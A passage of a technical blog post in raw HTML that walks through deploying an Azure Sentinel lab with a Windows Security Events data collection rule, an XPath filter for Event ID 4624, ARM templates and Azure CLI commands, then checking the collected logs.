data-contrast="none">&nbsp; "apiVersion": "2019-11-01-preview",</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp; "name": "WindowsDCR",</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp; "location": "eastus",</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp; "tags": {</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp; "createdBy": "Sentinel"</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp; },</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp; "properties": {</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp; "dataSources": {</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "windowsEventLogs": [</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; {</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "name": "eventLogsDataSource",</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "scheduledTransferPeriod": "PT5M",</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "streams": [</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "Microsoft-SecurityEvent"</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ],</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "xPathQueries": [</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "Security!*[System[(EventID=4624)]]"</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ]</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ]</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp; },</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp; "destinations": {</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "logAnalytics": [</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; {</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "name": "SecurityEvent",</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "workspaceId": "AZURE-SENTINEL-WORKSPACEID",</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "workspaceResourceId": "AZURE-SENTINEL-WORKSPACERESOURCEID"</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ]</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp; },</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp; "dataFlows": [</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; {</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "streams": [</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "Microsoft-SecurityEvent"</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ],</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "destinations": [</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "SecurityEvent"</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ]</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp; ]</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp; }</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">}</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></PRE> <P><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">One additional step&nbsp;in the setup of the&nbsp;new connector is the association of the DCR&nbsp;with&nbsp;Virtual Machines.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">This is the&nbsp;ARM&nbsp;template&nbsp;I&nbsp;use to create DCRAs:</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><A href="#" target="_blank" rel="noopener">Azure-Sentinel2Go/association.json at master · OTRF/Azure-Sentinel2Go (github.com)</A><BR /><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><STRONG><SPAN data-contrast="auto">Data Collection Rule Associations Azure Resource</SPAN></STRONG></P> <P>&nbsp;</P> <PRE><SPAN>{<BR /></SPAN><SPAN data-contrast="auto">&nbsp; "name": "WORKSTATION5/microsoft.insights/WindowsDCR",</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">"type": "Microsoft.Compute/virtualMachines/providers/dataCollectionRuleAssociations",</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&nbsp; "apiVersion": "2019-11-01-preview",</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&nbsp; "location": "eastus",</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&nbsp;&nbsp; "properties": {</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">"description": "Association of data collection rule. Deleting this association will break the data collection for this virtual machine.",</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&nbsp;&nbsp;&nbsp; "dataCollectionRuleId": "DATACOLLECTIONRULEID"</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&nbsp;&nbsp; }</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">}</SPAN><SPAN><BR /></SPAN></PRE> <P>&nbsp;</P> <P>&nbsp;</P> <P><STRONG><SPAN data-contrast="auto">What about the XPath Queries?</SPAN></STRONG></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">As shown in the previous section, the XPath query is part of the “<STRONG>dataSources</STRONG>” section of the data collection rule resource. It is defined under the&nbsp;‘<STRONG>windowsEventLogs</STRONG>’&nbsp;data source type.</SPAN><SPAN>&nbsp;<BR /></SPAN></P> <P>&nbsp;</P> <PRE><SPAN data-contrast="auto">"dataSources": {</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&nbsp; "windowsEventLogs": [</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&nbsp;&nbsp;&nbsp; {</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "name": "eventLogsDataSource",</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "scheduledTransferPeriod": "PT5M",</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "streams": [</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "Microsoft-SecurityEvent"</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ],</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "xPathQueries": [</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "Security!*[System[(EventID=4624)]]"</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ]</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&nbsp;&nbsp;&nbsp; }</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&nbsp; ]</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">}</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></PRE> <P>&nbsp;</P> <H3 aria-level="2">&nbsp;</H3> <H3 aria-level="2"><SPAN data-contrast="none">Create Deployment Template</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H3> <P>&nbsp;</P> <P><SPAN data-contrast="auto">We can&nbsp;easily&nbsp;add all those ARM&nbsp;templates to an ‘</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Azure Sentinel &amp; Win10 Workstation</SPAN></A><SPAN data-contrast="auto">’ basic&nbsp;</SPAN><SPAN data-contrast="auto">template</SPAN><SPAN data-contrast="auto">.&nbsp;</SPAN><SPAN data-contrast="auto">We just need to make sure we&nbsp;install the&nbsp;<STRONG>Azure Monitor Agent</STRONG></SPAN><SPAN data-contrast="auto">&nbsp;</SPAN><SPAN data-contrast="auto">instead of the <STRONG>Log Analytics</STRONG>&nbsp;one</SPAN><SPAN data-contrast="auto">,&nbsp;</SPAN><SPAN data-contrast="auto">and enable&nbsp;the</SPAN><SPAN data-contrast="auto">&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">system-assigned managed identity</SPAN></A><SPAN data-contrast="auto">&nbsp;</SPAN><SPAN data-contrast="auto">in the Azure VM.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <P><STRONG><SPAN data-contrast="auto">Template Resource List to Deploy:</SPAN></STRONG><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="34" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><SPAN data-contrast="auto">Azure Sentinel Instance</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="34" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><SPAN data-contrast="auto">Windows Virtual Machine</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="34" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><SPAN data-contrast="auto">Azure Monitor Agent Installed</SPAN><SPAN data-contrast="auto">.</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="34" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><SPAN data-contrast="auto">System-assigned managed identity Enabled.</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="34" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><SPAN data-contrast="auto">Data Collection Rule</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="34" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><SPAN data-contrast="auto">Log Analytics Workspace ID</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="34" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><SPAN data-contrast="auto">Log Analytics Workspace Resource ID</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="34" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><SPAN data-contrast="auto">Data Collection Rule Association</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="34" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><SPAN data-contrast="auto">Data Collection Rule ID</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="34" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><SPAN data-contrast="auto">Windows Virtual Machine Resource Name</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> <P>&nbsp;</P> <P><SPAN data-contrast="auto">The following ARM template can be used for our first basic&nbsp;scenario</SPAN><SPAN data-contrast="auto">:</SPAN></P> <P>&nbsp;</P> <P><A href="#" target="_blank" rel="noopener">Azure-Sentinel2Go/Win10-DCR-AzureResource.json at master · OTRF/Azure-Sentinel2Go (github.com)</A><BR /><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <H3 aria-level="2"><SPAN data-contrast="none">Run Deployment Template</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H3> <P>&nbsp;</P> <P><SPAN data-contrast="auto">You can deploy the ARM template via a “</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Deploy to Azure</SPAN></A><SPAN data-contrast="auto">”&nbsp;</SPAN><SPAN data-contrast="auto">button&nbsp;or via <A href="#" target="_self">Azure CLI</A>.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P aria-level="3">&nbsp;</P> <H4 aria-level="3"><SPAN data-contrast="none">“Deploy to Azure”&nbsp;Button</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H4> <OL> <LI aria-level="3"><SPAN data-contrast="auto">Browse to&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Azure Sentinel2Go repository</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI aria-level="3"><SPAN data-contrast="auto">Go to grocery-list/Win10/demos.</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI aria-level="3"><SPAN data-contrast="auto">Click on the “<STRONG>Deploy to Azure</STRONG>” button next to “<STRONG>Azure Sentinel + Win10 + DCR (DCR Resource)</STRONG>”</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;<BR /><BR /></SPAN></SPAN><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_0-1624589431099.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291177iAAA49D3342EE5F7D/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_0-1624589431099.png" alt="Cyb3rWard0g_0-1624589431099.png" /></span> <P>&nbsp;</P> </LI> <LI aria-level="3"><SPAN data-contrast="auto">Fill out the required parameters:</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN> <UL> <LI aria-level="3"><SPAN data-contrast="auto">adminUsername: admin user to create in the Windows workstation.</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI aria-level="3"><SPAN data-contrast="auto">adminPassword: password for admin user.</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI aria-level="3"><SPAN data-contrast="auto">allowedIPAddresses: Public IP address to&nbsp;restrict access to the lab environment.</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> </LI> <LI aria-level="3"><SPAN data-contrast="auto">Wait 5-10 mins and your environment should be ready.</SPAN><BR /><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </OL> <H4 aria-level="3"><SPAN data-contrast="none">Azure CLI</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H4> <OL> <LI><SPAN data-contrast="auto">Download <A href="#" target="_self">demo template</A>.</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI><SPAN data-contrast="auto">Open a terminal where you can&nbsp;run&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Azure CLI</SPAN></A><SPAN data-contrast="auto">&nbsp;from (i.e.&nbsp;PowerShell).</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI><SPAN data-contrast="auto">Log in to your Azure Tenant locally.<BR /><BR /></SPAN> <PRE><SPAN data-contrast="none">az&nbsp;login</SPAN>&nbsp;</PRE> </LI> <LI><SPAN data-contrast="auto">Create Resource Group (Optional)<BR /></SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"><BR /></SPAN> <PRE><SPAN data-contrast="none">az&nbsp;group create -n&nbsp;AzSentinelDemo&nbsp;-l&nbsp;eastus</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></PRE> </LI> <LI><SPAN data-contrast="auto">Deploy ARM template locally.<BR /></SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"><BR /></SPAN> <PRE><SPAN data-contrast="none">az&nbsp;deployment group create&nbsp;–f&nbsp;./ Win10-DCR-AzureResource.json -g MYRESOURCRGROUP –adminUsername&nbsp;MYUSER –adminPassword&nbsp;MYUSERPASSWORD –allowedIPAddresses&nbsp;x.x.x.x</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></PRE> </LI> <LI><SPAN data-contrast="auto">Wait 5-10 mins and your environment should be ready.</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </OL> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-contrast="auto">Whether you use the UI or the CLI, you can monitor your deployment&nbsp;by going to Resource Group &gt; Deployments:</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_13-1624563350637.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291061iD3FA95B731C7D4A2/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_13-1624563350637.png" alt="Cyb3rWard0g_13-1624563350637.png" /></span></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">&nbsp;</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_14-1624563350638.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291062iC6882B6F8D19BD76/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_14-1624563350638.png" alt="Cyb3rWard0g_14-1624563350638.png" /></span></P> <P>&nbsp;</P> <H2><SPAN data-contrast="none">Verify Lab Resources</SPAN><SPAN>&nbsp;</SPAN></H2> <H3>&nbsp;</H3> <P><SPAN data-contrast="none">Once your environment is deployed successfully, I recommend verifying every resource that was deployed.</SPAN></P> <H3>&nbsp;</H3> <H3><SPAN data-contrast="none">Azure Sentinel New Data Connector</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></H3> <P>&nbsp;</P> <P><SPAN data-contrast="auto">You will see the <STRONG>Windows Security Events (Preview)</STRONG>&nbsp;data connector enabled with a custom <STRONG>Data Collection Rules (DCR)</STRONG>:</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_15-1624563350665.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291065i883D30E9F4EF7004/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_15-1624563350665.png" alt="Cyb3rWard0g_15-1624563350665.png" /></span></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">If you edit the custom DCR, you will see the XPath query and the resource that it got associated with. The image below shows the association of the DCR with a machine named <STRONG>workstation5.</STRONG></SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_16-1624563350641.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291064iF2D12F48A6172688/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_16-1624563350641.png" alt="Cyb3rWard0g_16-1624563350641.png" /></span></P> <P>&nbsp;</P> <P>You can also see that the data collection is set to <STRONG>custom</STRONG> and, for this example, we only set the event stream to collect events with <STRONG>Event ID 4624</STRONG>.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_17-1624563350642.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291066i01C988E45895710D/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_17-1624563350642.png" alt="Cyb3rWard0g_17-1624563350642.png" /></span></P> <P>&nbsp;</P> <H3 aria-level="3"><SPAN data-contrast="none">Windows Workstation</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H3> <P>&nbsp;</P> <P><SPAN data-contrast="auto">I recommend to RDP to the Windows Workstation by using its Public IP Address. Go to your resource group and select the Azure VM. You should see the public IP address to the right of the screen. This&nbsp;would generate authentication events&nbsp;which will be captured by the custom DCR associated with the endpoint.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_18-1624563350668.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291069iD97997E8318B9A70/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_18-1624563350668.png" alt="Cyb3rWard0g_18-1624563350668.png" /></span></P> <P>&nbsp;</P> <H3 aria-level="3"><SPAN data-contrast="none">Check Azure Sentinel Logs</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H3> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Go back to your Azure Sentinel, and you should start seeing some events&nbsp;on&nbsp;the <STRONG>Overview</STRONG> page:</SPAN></P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_19-1624563350654.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291067i569F3D73FA0B5308/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_19-1624563350654.png" alt="Cyb3rWard0g_19-1624563350654.png" /></span></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Go to <STRONG>Logs</STRONG> and run the following KQL query:</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <PRE><SPAN data-contrast="auto">SecurityEvent</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN 